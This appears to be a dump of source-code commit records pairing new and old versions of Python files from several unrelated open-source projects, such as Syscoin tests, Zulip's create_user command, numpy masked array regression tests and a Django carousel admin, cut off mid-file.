5836b48bbfa87ba706e6ddcb267dc375678695a8 | use str | test/functional/feature_asset_burn.py | test/functional/feature_asset_burn.py | #!/usr/bin/env python3
# Copyright (c) 2019-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
class AssetBurnTest(SyscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 240
self.extra_args = [['-assetindex=1'],['-assetindex=1']]
def run_test(self):
self.nodes[0].generate(200)
self.sync_blocks()
self.basic_burn_syscoin()
self.basic_audittxroot1()
def basic_burn_syscoin(self):
self.basic_asset()
self.nodes[0].generate(1)
newaddress = self.nodes[0].getnewaddress()
self.nodes[0].assetsend(self.asset, newaddress, '0.5')
self.nodes[0].generate(1)
out = self.nodes[0].listunspent(query_options={'assetGuid': self.asset})
assert_equal(len(out), 1)
# try to burn more than we own
assert_raises_rpc_error(-20, 'Failed to read from asset DB', self.nodes[0].assetallocationburn(self.asset, newaddress, '0.6', '0x931d387731bbbc988b312206c74f77d004d6b84b'))
self.nodes[0].assetallocationburn(self.asset, newaddress, '0.5', '0x931d387731bbbc988b312206c74f77d004d6b84b')
self.nodes[0].generate(1)
out = self.nodes[0].listunspent(query_options={'assetGuid': self.asset})
assert_equal(len(out), 0)
def basic_asset(self):
self.asset = self.nodes[0].assetnew('1', 'TST', 'asset description', '0x9f90b5093f35aeac5fbaeb591f9c9de8e2844a46', 8, '1000', '10000', 31, {})['asset_guid']
if __name__ == '__main__':
AssetBurnTest().main()
| #!/usr/bin/env python3
# Copyright (c) 2019-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
class AssetBurnTest(SyscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 240
self.extra_args = [['-assetindex=1'],['-assetindex=1']]
def run_test(self):
self.nodes[0].generate(200)
self.sync_blocks()
self.basic_burn_syscoin()
self.basic_audittxroot1()
def basic_burn_syscoin(self):
self.basic_asset()
self.nodes[0].generate(1)
newaddress = self.nodes[0].getnewaddress()
self.nodes[0].assetsend(self.asset, newaddress, 0.5)
self.nodes[0].generate(1)
out = self.nodes[0].listunspent(query_options={'assetGuid': self.asset})
assert_equal(len(out), 1)
# try to burn more than we own
assert_raises_rpc_error(-20, 'Failed to read from asset DB', self.nodes[0].assetallocationburn(self.asset, newaddress, 0.6, '0x931d387731bbbc988b312206c74f77d004d6b84b'))
self.nodes[0].assetallocationburn(self.asset, newaddress, 0.5, '0x931d387731bbbc988b312206c74f77d004d6b84b')
self.nodes[0].generate(1)
out = self.nodes[0].listunspent(query_options={'assetGuid': self.asset})
assert_equal(len(out), 0)
def basic_asset(self):
self.asset = self.nodes[0].assetnew('1', 'TST', 'asset description', '0x9f90b5093f35aeac5fbaeb591f9c9de8e2844a46', 8, '1000', '10000', 31, {})['asset_guid']
if __name__ == '__main__':
AssetBurnTest().main()
| Python | 0.000001 |
9d2766a7b6aae9e3ad3c94925bdde100a70f6150 | fix debug_view function | src/psd_tools/debug.py | src/psd_tools/debug.py | # -*- coding: utf-8 -*-
"""
Assorted debug utilities
"""
from __future__ import absolute_import, print_function
import sys
from collections import namedtuple
try:
from IPython.lib.pretty import pprint
_PRETTY_ENABLED = True
except ImportError:
from pprint import pprint
_PRETTY_ENABLED = False
def debug_view(fp, txt="", max_back=20):
"""
Print file contents around current position for file pointer ``fp``
"""
max_back = min(max_back, fp.tell())
fp.seek(-max_back, 1)
pre = fp.read(max_back)
post = fp.read(100)
fp.seek(-100, 1)
print(txt, repr(pre), "--->.<---", repr(post))
def pretty_namedtuple(typename, field_names, verbose=False):
"""
Return a namedtuple class that knows how to pretty-print itself
using IPython.lib.pretty library; if IPython is not installed
then this function is the same as collections.namedtuple
(with one exception: 'rename' argument is unsupported).
"""
cls = namedtuple(typename, field_names, verbose)
if _PRETTY_ENABLED:
PrettyMixin = _get_pretty_mixin(typename)
cls = type(str(typename), (PrettyMixin, cls), {})
# For pickling to work, the __module__ variable needs to be set to the frame
# where the named tuple is created. Bypass this step in enviroments where
# sys._getframe is not defined (Jython for example) or sys._getframe is not
# defined for arguments greater than 0 (IronPython).
try:
cls.__module__ = sys._getframe(1).f_globals.get('__name__', '__main__')
except (AttributeError, ValueError):
pass
return cls
def _get_pretty_mixin(typename):
"""
Return a mixin class for multiline pretty-printing
of namedtuple objects.
"""
class _PrettyNamedtupleMixin(object):
def _repr_pretty_(self, p, cycle):
if cycle:
return "{typename}(...)".format(name=typename)
with p.group(1, '{name}('.format(name=typename), ')'):
p.breakable()
for idx, field in enumerate(self._fields):
if idx:
p.text(',')
p.breakable()
p.text('{field}='.format(field=field))
p.pretty(getattr(self, field))
return _PrettyNamedtupleMixin
| # -*- coding: utf-8 -*-
"""
Assorted debug utilities
"""
from __future__ import absolute_import
import sys
from collections import namedtuple
try:
from IPython.lib.pretty import pprint
_PRETTY_ENABLED = True
except ImportError:
from pprint import pprint
_PRETTY_ENABLED = False
def debug_view(fp, txt="", max_back=20):
"""
Print file contents around current position for file pointer ``fp``
"""
max_back = min(max_back, fp.tell())
fp.seek(-max_back, 1)
pre = fp.read(max_back)
post = fp.read(100)
fp.seek(-100, 1)
print(txt, repr(pre), "--->.<---", repr(post))
def pretty_namedtuple(typename, field_names, verbose=False):
"""
Return a namedtuple class that knows how to pretty-print itself
using IPython.lib.pretty library; if IPython is not installed
then this function is the same as collections.namedtuple
(with one exception: 'rename' argument is unsupported).
"""
cls = namedtuple(typename, field_names, verbose)
if _PRETTY_ENABLED:
PrettyMixin = _get_pretty_mixin(typename)
cls = type(str(typename), (PrettyMixin, cls), {})
# For pickling to work, the __module__ variable needs to be set to the frame
# where the named tuple is created. Bypass this step in enviroments where
# sys._getframe is not defined (Jython for example) or sys._getframe is not
# defined for arguments greater than 0 (IronPython).
try:
cls.__module__ = sys._getframe(1).f_globals.get('__name__', '__main__')
except (AttributeError, ValueError):
pass
return cls
def _get_pretty_mixin(typename):
"""
Return a mixin class for multiline pretty-printing
of namedtuple objects.
"""
class _PrettyNamedtupleMixin(object):
def _repr_pretty_(self, p, cycle):
if cycle:
return "{typename}(...)".format(name=typename)
with p.group(1, '{name}('.format(name=typename), ')'):
p.breakable()
for idx, field in enumerate(self._fields):
if idx:
p.text(',')
p.breakable()
p.text('{field}='.format(field=field))
p.pretty(getattr(self, field))
return _PrettyNamedtupleMixin
| Python | 0.000021 |
2bc1cd6ab4be134758edcc8739b89ce4984131b4 | Fix overly large try/except block. | zerver/management/commands/create_user.py | zerver/management/commands/create_user.py | import argparse
import logging
from typing import Any, Optional
from django.conf import settings
from django.core import validators
from django.core.exceptions import ValidationError
from django.core.management.base import CommandError
from django.db.utils import IntegrityError
from zerver.lib.actions import do_create_user
from zerver.lib.initial_password import initial_password
from zerver.lib.management import ZulipBaseCommand
class Command(ZulipBaseCommand):
help = """Create the specified user with a default initial password.
Sets tos_version=None, so that the user needs to do a ToS flow on login.
Omit both <email> and <full name> for interactive user creation.
"""
def add_arguments(self, parser: argparse.ArgumentParser) -> None:
self.add_create_user_args(parser)
self.add_realm_args(
parser, required=True, help="The name of the existing realm to which to add the user."
)
def handle(self, *args: Any, **options: Any) -> None:
realm = self.get_realm(options)
assert realm is not None # Should be ensured by parser
if "email" not in options:
email = input("Email: ")
else:
email = options["email"]
try:
validators.validate_email(email)
except ValidationError:
raise CommandError("Invalid email address.")
if "full_name" not in options:
full_name = input("Full name: ")
else:
full_name = options["full_name"]
if options["password_file"] is not None:
with open(options["password_file"]) as f:
pw: Optional[str] = f.read().strip()
elif options["password"] is not None:
logging.warning(
"Passing password on the command line is insecure; prefer --password-file."
)
pw = options["password"]
else:
# initial_password will return a random password that
# is a salted hash of the email address in a
# development environment, and None in a production
# environment.
user_initial_password = initial_password(email)
if user_initial_password is None:
logging.info("User will be created with a disabled password.")
else:
assert settings.DEVELOPMENT
logging.info("Password will be available via `./manage.py print_initial_password`.")
pw = user_initial_password
try:
do_create_user(
email,
pw,
realm,
full_name,
# Explicitly set tos_version=None. For servers that
# have configured Terms of Service, this means that
# users created via this mechanism will be prompted to
# accept the Terms of Service on first login.
tos_version=None,
acting_user=None,
)
except IntegrityError:
raise CommandError("User already exists.")
| import argparse
import logging
from typing import Any, Optional
from django.conf import settings
from django.core import validators
from django.core.exceptions import ValidationError
from django.core.management.base import CommandError
from django.db.utils import IntegrityError
from zerver.lib.actions import do_create_user
from zerver.lib.initial_password import initial_password
from zerver.lib.management import ZulipBaseCommand
class Command(ZulipBaseCommand):
help = """Create the specified user with a default initial password.
Sets tos_version=None, so that the user needs to do a ToS flow on login.
Omit both <email> and <full name> for interactive user creation.
"""
def add_arguments(self, parser: argparse.ArgumentParser) -> None:
self.add_create_user_args(parser)
self.add_realm_args(
parser, required=True, help="The name of the existing realm to which to add the user."
)
def handle(self, *args: Any, **options: Any) -> None:
realm = self.get_realm(options)
assert realm is not None # Should be ensured by parser
if "email" not in options:
email = input("Email: ")
else:
email = options["email"]
try:
validators.validate_email(email)
except ValidationError:
raise CommandError("Invalid email address.")
if "full_name" not in options:
full_name = input("Full name: ")
else:
full_name = options["full_name"]
try:
if options["password_file"] is not None:
with open(options["password_file"]) as f:
pw: Optional[str] = f.read().strip()
elif options["password"] is not None:
logging.warning(
"Passing password on the command line is insecure; prefer --password-file."
)
pw = options["password"]
else:
# initial_password will return a random password that
# is a salted hash of the email address in a
# development environment, and None in a production
# environment.
user_initial_password = initial_password(email)
if user_initial_password is None:
logging.info("User will be created with a disabled password.")
else:
assert settings.DEVELOPMENT
logging.info(
"Password will be available via `./manage.py print_initial_password`."
)
pw = user_initial_password
do_create_user(
email,
pw,
realm,
full_name,
# Explicitly set tos_version=None. For servers that
# have configured Terms of Service, this means that
# users created via this mechanism will be prompted to
# accept the Terms of Service on first login.
tos_version=None,
acting_user=None,
)
except IntegrityError:
raise CommandError("User already exists.")
| Python | 0 |
b2b19d5bd608db9286448000e1c998784139a614 | update join | classmate_party/views.py | classmate_party/views.py | # -*- coding: utf-8 -*-
import os
import uuid
from PIL import Image
from django.shortcuts import render_to_response
from models import *
def index(request):
return render_to_response('index.html', locals())
def join(request):
msg = ''
category_choice = Person.CATEGORY_CHOICE
if request.method == 'POST':
categorys = request.POST.getlist('category')
name = request.POST.get('name')
phone_num = request.POST.get('phone_num')
pic = request.FILES.get('pic')
location1 = request.POST.get('location1', '')
location2 = request.POST.get('location2', '')
location = location1 + ' ' + location2
if not categorys:
msg = u'请勾选报名项目'
elif not name:
msg = u'请填写姓名'
elif not phone_num:
msg = u'请填写手机号'
else:
try:
im = Image.open(pic)
w, h = im.size
if h > 500:
r = h / 500.0
w = int(w / r)
h = int(h / r)
im = im.resize((w, h))
filename = "static/header/%s.png" % uuid.uuid4()
path = os.path.join(os.getcwd(), filename)
im.save(path)
pic_url = '/' + filename
modify_persons = []
for category in categorys:
person, created = Person.objects.get_or_create(category=category, name=name)
modify_persons.append(person)
for person in Person.objects.filter(name=name):
update_fields = ['phone_num', 'pic_url', 'location']
if person in modify_persons:
update_fields.append('update_time')
person.phone_num = ''
person.save()
person.phone_num = phone_num
person.pic_url = pic_url
person.location = location
person.save(update_fields=update_fields)
success = True
except:
msg = u'请上传一张您的近期照片'
return render_to_response('join.html', locals())
def list_persons(request):
rs = []
for category, category_display in Person.CATEGORY_CHOICE:
r = {}
r['category_display'] = category_display
r['persons'] = Person.objects.filter(category=category).order_by('update_time')
r['count'] = r['persons'].count
rs.append(r)
return render_to_response('list_persons.html', locals())
| # -*- coding: utf-8 -*-
import os
import uuid
from PIL import Image
from django.shortcuts import render_to_response
from models import *
def index(request):
return render_to_response('index.html', locals())
def join(request):
msg = ''
category_choice = Person.CATEGORY_CHOICE
if request.method == 'POST':
categorys = request.POST.getlist('category')
name = request.POST.get('name')
phone_num = request.POST.get('phone_num')
pic = request.FILES.get('pic')
location1 = request.POST.get('location1', '')
location2 = request.POST.get('location2', '')
location = location1 + ' ' + location2
if not categorys:
msg = u'请勾选报名项目'
elif not name:
msg = u'请填写姓名'
elif not phone_num:
msg = u'请填写手机号'
else:
try:
im = Image.open(pic)
w, h = im.size
if h > 500:
r = h / 500.0
w = int(w / r)
h = int(h / r)
im = im.resize((w, h))
filename = "static/header/%s.png" % uuid.uuid4()
path = os.path.join(os.getcwd(), filename)
im.save(path)
pic_url = '/' + filename
for category in categorys:
person, created = Person.objects.get_or_create(category=category, name=name)
Person.objects.filter(name=name).update(
phone_num=phone_num,
pic_url=pic_url,
location=location
)
success = True
except:
msg = u'请上传一张您的近期照片'
return render_to_response('join.html', locals())
def list_persons(request):
rs = []
for category, category_display in Person.CATEGORY_CHOICE:
r = {}
r['category_display'] = category_display
r['persons'] = Person.objects.filter(category=category).order_by('update_time')
r['count'] = r['persons'].count
rs.append(r)
return render_to_response('list_persons.html', locals())
| Python | 0 |
5e991fd00d980884f9210cfd5f25d5e7d91aabfc | Fix race condition in #144 | test/replication/init_storage.test.py | test/replication/init_storage.test.py | import os
import glob
from lib.tarantool_server import TarantoolServer
# master server
master = server
master.admin('space = box.schema.create_space(\'test\', {id = 42})')
master.admin('space:create_index(\'primary\', \'hash\', {parts = { 0, \'num\' } })')
master.admin('for k = 1, 9 do space:insert(k, k*k) end')
for k in glob.glob(os.path.join(master.vardir, '*.xlog')):
os.unlink(k)
print '-------------------------------------------------------------'
print 'replica test 1 (must be failed)'
print '-------------------------------------------------------------'
replica = TarantoolServer()
replica.deploy("replication/cfg/replica.cfg",
replica.find_exe(self.args.builddir),
os.path.join(self.args.vardir, "replica"),
need_init=False)
for i in range(1, 10):
replica.admin('box.select(42, 0, %d)' % i)
replica.stop()
replica.cleanup(True)
master.admin('box.snapshot()')
master.restart()
master.admin('for k = 10, 19 do box.insert(42, k, k*k*k) end')
lsn = master.get_param('lsn')
print '-------------------------------------------------------------'
print 'replica test 2 (must be ok)'
print '-------------------------------------------------------------'
replica = TarantoolServer()
replica.deploy("replication/cfg/replica.cfg",
replica.find_exe(self.args.builddir),
os.path.join(self.args.vardir, "replica"),
need_init=False)
replica.admin('space = box.space.test');
replica.wait_lsn(lsn)
for i in range(1, 20):
replica.admin('space:select(0, %d)' % i)
replica.stop()
replica.cleanup(True)
server.stop()
server.deploy(self.suite_ini["config"])
| import os
import glob
from lib.tarantool_server import TarantoolServer
# master server
master = server
master.admin('space = box.schema.create_space(\'test\', {id = 42})')
master.admin('space:create_index(\'primary\', \'hash\', {parts = { 0, \'num\' } })')
master.admin('for k = 1, 9 do space:insert(k, k*k) end')
for k in glob.glob(os.path.join(master.vardir, '*.xlog')):
os.unlink(k)
print '-------------------------------------------------------------'
print 'replica test 1 (must be failed)'
print '-------------------------------------------------------------'
replica = TarantoolServer()
replica.deploy("replication/cfg/replica.cfg",
replica.find_exe(self.args.builddir),
os.path.join(self.args.vardir, "replica"),
need_init=False)
for i in range(1, 10):
replica.admin('box.select(42, 0, %d)' % i)
replica.stop()
replica.cleanup(True)
master.admin('box.snapshot()')
master.restart()
master.admin('for k = 10, 19 do box.insert(42, k, k*k*k) end')
print '-------------------------------------------------------------'
print 'replica test 2 (must be ok)'
print '-------------------------------------------------------------'
replica = TarantoolServer()
replica.deploy("replication/cfg/replica.cfg",
replica.find_exe(self.args.builddir),
os.path.join(self.args.vardir, "replica"),
need_init=False)
replica.admin('space = box.space.test');
for i in range(1, 20):
replica.admin('space:select(0, %d)' % i)
replica.stop()
replica.cleanup(True)
server.stop()
server.deploy(self.suite_ini["config"])
| Python | 0 |
0ea32a2b51438b55130082e54f30fc9c97bd9d85 | Fix compatibility with oslo.db 12.1.0 | cloudkitty/db/__init__.py | cloudkitty/db/__init__.py | # -*- coding: utf-8 -*-
# Copyright 2014 Objectif Libre
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo_config import cfg
from oslo_db.sqlalchemy import session
_FACADE = None
def _create_facade_lazily():
global _FACADE
if _FACADE is None:
# FIXME(priteau): Remove autocommit=True (and ideally use of
# LegacyEngineFacade) asap since it's not compatible with SQLAlchemy
# 2.0.
_FACADE = session.EngineFacade.from_config(cfg.CONF, sqlite_fk=True,
autocommit=True)
return _FACADE
def get_engine():
facade = _create_facade_lazily()
return facade.get_engine()
def get_session(**kwargs):
facade = _create_facade_lazily()
return facade.get_session(**kwargs)
| # -*- coding: utf-8 -*-
# Copyright 2014 Objectif Libre
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo_config import cfg
from oslo_db.sqlalchemy import session
_FACADE = None
def _create_facade_lazily():
global _FACADE
if _FACADE is None:
_FACADE = session.EngineFacade.from_config(cfg.CONF, sqlite_fk=True)
return _FACADE
def get_engine():
facade = _create_facade_lazily()
return facade.get_engine()
def get_session(**kwargs):
facade = _create_facade_lazily()
return facade.get_session(**kwargs)
| Python | 0.000019 |
cfe7de10ef9c6c1d8d5be71993e5f96ace58953d | Update Ansible release version to 2.6.0dev0. | lib/ansible/release.py | lib/ansible/release.py | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
__version__ = '2.6.0dev0'
__author__ = 'Ansible, Inc.'
__codename__ = 'Heartbreaker'
| # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
__version__ = '2.6.0a1'
__author__ = 'Ansible, Inc.'
__codename__ = 'Heartbreaker'
| Python | 0 |
359f337d7cfd0dac2eec8ecce643af10588e3e6a | Fix i18n __radd__ bug | uliweb/i18n/lazystr.py | uliweb/i18n/lazystr.py | def lazy(func):
def f(message):
return LazyString(func, message)
return f
class LazyString(object):
"""
>>> from uliweb.i18n import gettext_lazy as _
>>> x = _('Hello')
>>> print repr(x)
"""
def __init__(self, func, message):
self._func = func
self.msg = message
self._format = []
def __unicode__(self):
if not self.msg:
return ''
value = self.getvalue()
if isinstance(value, unicode):
return value
else:
return unicode(self.getvalue(), 'utf-8')
def __str__(self):
if not self.msg:
return ''
value = self.getvalue()
if isinstance(value, unicode):
return value.encode('utf-8')
else:
return str(value)
def format(self, *args, **kwargs):
self._format.append((args, kwargs))
return self
def getvalue(self):
v = self._func(self.msg)
for args, kwargs in self._format:
v = v.format(*args, **kwargs)
return v
def __repr__(self):
return "%s_lazy(%r)" % (self._func.__name__, self.msg)
def __add__(self, obj):
return self.getvalue() + obj
def __radd__(self, obj):
return obj + self.getvalue()
def encode(self, encoding):
return self.getvalue().encode(encoding)
def split(self, *args, **kwargs):
return self.getvalue().split(*args, **kwargs)
# def __getattr__(self, name):
# return getattr(self.getvalue(), name)
| def lazy(func):
def f(message):
return LazyString(func, message)
return f
class LazyString(object):
"""
>>> from uliweb.i18n import gettext_lazy as _
>>> x = _('Hello')
>>> print repr(x)
"""
def __init__(self, func, message):
self._func = func
self.msg = message
self._format = []
def __unicode__(self):
if not self.msg:
return ''
value = self.getvalue()
if isinstance(value, unicode):
return value
else:
return unicode(self.getvalue(), 'utf-8')
def __str__(self):
if not self.msg:
return ''
value = self.getvalue()
if isinstance(value, unicode):
return value.encode('utf-8')
else:
return str(value)
def format(self, *args, **kwargs):
self._format.append((args, kwargs))
return self
def getvalue(self):
v = self._func(self.msg)
for args, kwargs in self._format:
v = v.format(*args, **kwargs)
return v
def __repr__(self):
return "%s_lazy(%r)" % (self._func.__name__, self.msg)
def __add__(self, obj):
return self.getvalue() + obj
def __radd__(self, obj):
return self.getvalue() + obj
def encode(self, encoding):
return self.getvalue().encode(encoding)
def split(self, *args, **kwargs):
return self.getvalue().split(*args, **kwargs)
# def __getattr__(self, name):
# return getattr(self.getvalue(), name)
| Python | 0.263457 |
ac985005f925c0d37ae337ada0bf88b50becaee6 | change scheduler | coalics/schedule.py | coalics/schedule.py | import os.path
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import logging
from coalics import tasks, q, redis, app
from datetime import datetime
from datetime import datetime, timedelta
import time
# stream_handler = logging.StreamHandler()
# stream_handler.setLevel(logging.INFO)
# app.logger.addHandler(stream_handler)
logger = logging.getLogger("Scheduler")
fh = logging.FileHandler("/app/log/scheduler.log")
fh.setLevel(logging.INFO)
logger.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
fh.setFormatter(formatter)
logger.addHandler(fh)
prev_job = None
td = timedelta(seconds=app.config["SOURCE_UPDATE_FREQUENCY"])
logger.info("Scheduler launching")
while True:
try:
logger.info("Begin schedule run")
q.enqueue(tasks.update_sources, timeout=td.seconds*0.9)
logger.info("Scheduler: ran without error")
except Exception as e:
logger.error("Scheduler: caught error {}".format(str(e)))
finally:
logger.info("Scheduler: Sleeping for {}s".format(td.seconds))
time.sleep(td.seconds)
| import os.path
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import logging
from coalics import tasks, q, redis, app
from datetime import datetime
from datetime import datetime, timedelta
import time
# stream_handler = logging.StreamHandler()
# stream_handler.setLevel(logging.INFO)
# app.logger.addHandler(stream_handler)
logger = logging.getLogger("Scheduler")
fh = logging.FileHandler("/app/log/scheduler.log")
fh.setLevel(logging.INFO)
logger.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
fh.setFormatter(formatter)
logger.addHandler(fh)
prev_job = None
td = timedelta(seconds=app.config["SOURCE_UPDATE_FREQUENCY"])
logger.info("Scheduler launching")
while True:
try:
logger.info("Begin schedule run")
if prev_job: print(prev_job.result)
if prev_job == None or prev_job.result != None:
prev_job = q.enqueue(tasks.update_sources, timeout=td.seconds*0.9)
logger.info("Scheduler: ran without error")
except Exception as e:
logger.error("Scheduler: caught error {}".format(str(e)))
finally:
logger.info("Scheduler: Sleeping for {}s".format(td.seconds))
time.sleep(td.seconds)
| Python | 0.000001 |
9b354f4dc00e3aef4cfceae71be60b1dc60a1927 | Add test for ticket #1559. | numpy/ma/tests/test_regression.py | numpy/ma/tests/test_regression.py | from numpy.testing import *
import numpy as np
rlevel = 1
class TestRegression(TestCase):
def test_masked_array_create(self,level=rlevel):
"""Ticket #17"""
x = np.ma.masked_array([0,1,2,3,0,4,5,6],mask=[0,0,0,1,1,1,0,0])
assert_array_equal(np.ma.nonzero(x),[[1,2,6,7]])
def test_masked_array(self,level=rlevel):
"""Ticket #61"""
x = np.ma.array(1,mask=[1])
def test_mem_masked_where(self,level=rlevel):
"""Ticket #62"""
from numpy.ma import masked_where, MaskType
a = np.zeros((1,1))
b = np.zeros(a.shape, MaskType)
c = masked_where(b,a)
a-c
def test_masked_array_multiply(self,level=rlevel):
"""Ticket #254"""
a = np.ma.zeros((4,1))
a[2,0] = np.ma.masked
b = np.zeros((4,2))
a*b
b*a
def test_masked_array_repeat(self, level=rlevel):
"""Ticket #271"""
np.ma.array([1],mask=False).repeat(10)
def test_masked_array_repr_unicode(self):
"""Ticket #1256"""
repr(np.ma.array(u"Unicode"))
def test_atleast_2d(self):
"""Ticket #1559"""
a = np.ma.masked_array([0.0, 1.2, 3.5], mask=[False, True, False])
b = np.atleast_2d(a)
assert_(a.mask.ndim == 1)
assert_(b.mask.ndim == 2)
if __name__ == "__main__":
run_module_suite()
| from numpy.testing import *
import numpy as np
rlevel = 1
class TestRegression(TestCase):
def test_masked_array_create(self,level=rlevel):
"""Ticket #17"""
x = np.ma.masked_array([0,1,2,3,0,4,5,6],mask=[0,0,0,1,1,1,0,0])
assert_array_equal(np.ma.nonzero(x),[[1,2,6,7]])
def test_masked_array(self,level=rlevel):
"""Ticket #61"""
x = np.ma.array(1,mask=[1])
def test_mem_masked_where(self,level=rlevel):
"""Ticket #62"""
from numpy.ma import masked_where, MaskType
a = np.zeros((1,1))
b = np.zeros(a.shape, MaskType)
c = masked_where(b,a)
a-c
def test_masked_array_multiply(self,level=rlevel):
"""Ticket #254"""
a = np.ma.zeros((4,1))
a[2,0] = np.ma.masked
b = np.zeros((4,2))
a*b
b*a
def test_masked_array_repeat(self, level=rlevel):
"""Ticket #271"""
np.ma.array([1],mask=False).repeat(10)
def test_masked_array_repr_unicode(self):
"""Ticket #1256"""
repr(np.ma.array(u"Unicode"))
| Python | 0 |
813c478f06c175e36dc8334fd37195e403a42166 | update test_symbol_accuracy | test_symbol_accuracy.py | test_symbol_accuracy.py | from dataset import create_testing_data_for_symbol, get_symbol_list
from keras.models import load_model
import sys
INITIAL_CAPITAL = 10000.0
PERCENT_OF_CAPITAL_PER_TRANSACTION = 10.0
TRANSACTION_FEE = 0
def compare(x, y):
if x[3] < y[3]:
return 1
return -1
def main():
model = load_model(sys.argv[1])
symbols = get_symbol_list()
gains = []
for sym in symbols:
print "----"
X, Y = create_testing_data_for_symbol(sym)
money = INITIAL_CAPITAL
true_pos = 0
false_pos = 0
for i in range(len(X)):
current = X[i]
current_value = current[0][-1]
prediction = model.predict(X[i:i+1])
if prediction[0][0] > current_value * 1.01:
investment = 100.0
money -= investment + TRANSACTION_FEE * 2.0
revenue = Y[i:i+1][0][0] / current_value * investment
gain = revenue - investment
money += revenue
if gain > 0.0:
true_pos += 1
else:
false_pos += 1
print ""
print "symbol:", sym
total_gain = money - INITIAL_CAPITAL
percent_gain = ((money / INITIAL_CAPITAL) - 1.0) * 100.0
print "gain:", total_gain, "(", percent_gain, ")"
accuracy = 0 if false_pos+true_pos == 0 else float(true_pos)/float(false_pos+true_pos)
print "true pos:", true_pos, "false pos:", false_pos, "accuracy:", accuracy
gains.append([sym, true_pos, false_pos, accuracy, total_gain, percent_gain])
gains.sort(compare)
for item in gains:
print item
if __name__ == "__main__":
# import dataset
# X, y = dataset.create_testing_data_for_symbol('CBI')
# print X
main() | from dataset import create_testing_data_for_symbol, get_symbol_list
from keras.models import load_model
import sys
INITIAL_CAPITAL = 10000.0
PERCENT_OF_CAPITAL_PER_TRANSACTION = 10.0
TRANSACTION_FEE = 0
def compare(x, y):
if x[1] < y[1]:
return 1
return -1
def main():
model = load_model(sys.argv[1])
symbols = get_symbol_list()
gains = []
for sym in symbols:
X, Y = create_testing_data_for_symbol(sym)
print "----"
money = INITIAL_CAPITAL
for i in range(len(X)):
current = X[i]
current_value = current[0][-1]
prediction = model.predict(X[i:i+1])
if prediction[0][0] > current_value * 1.02:
investment = 100.0
money -= investment + TRANSACTION_FEE * 2.0
revenue = Y[i:i+1][0][0] / current_value * investment
gain = revenue - investment
money += revenue
print ""
print "symbol:", sym
total_gain = money - INITIAL_CAPITAL
percent_gain = ((money / INITIAL_CAPITAL) - 1.0) * 100.0
print "gain:", total_gain, "(", percent_gain, ")"
gains.append([sym, total_gain, percent_gain])
gains.sort(compare)
for item in gains:
print item
if __name__ == "__main__":
main() | Python | 0.000025 |
cf4fc126b49c425d7f441abc91f4114b5f1303ea | Move publication field above tite//subtitle/description in admin | cms_lab_carousel/admin.py | cms_lab_carousel/admin.py | from django.contrib import admin
from cms_lab_carousel.models import Carousel, Slide
class CarouselAdmin(admin.ModelAdmin):
fieldset_frame = ('Carousel Frame', {
'fields': [
'title',
'header_image',
'footer_image',
],
})
fieldset_visibility = ('Visibility', {
'fields': [
'show_title',
'show_header',
'show_footer',
],
'classes': ['collapse'],
})
fieldset_slides = ('Slide Settings', {
'fields': [
'slider_height',
'slider_duration',
'slide_limit',
],
'classes': ['collapse'],
})
fieldsets = [
fieldset_frame,
fieldset_visibility,
fieldset_slides,
]
search_fields = ['title']
admin.site.register(Carousel, CarouselAdmin)
class CarouselFilter(admin.SimpleListFilter):
title = 'Carousel'
parameter_name = 'carousel'
def lookups(self, request, model_admin):
carousel_list = set([slide.carousel for slide in model_admin.model.objects.all()])
return [(carousel.id, carousel.title) for carousel in carousel_list]
def queryset(self, request, queryset):
if self.value():
return queryset.filter(carousel__id__exact=self.value())
else:
return queryset
class SlideAdmin(admin.ModelAdmin):
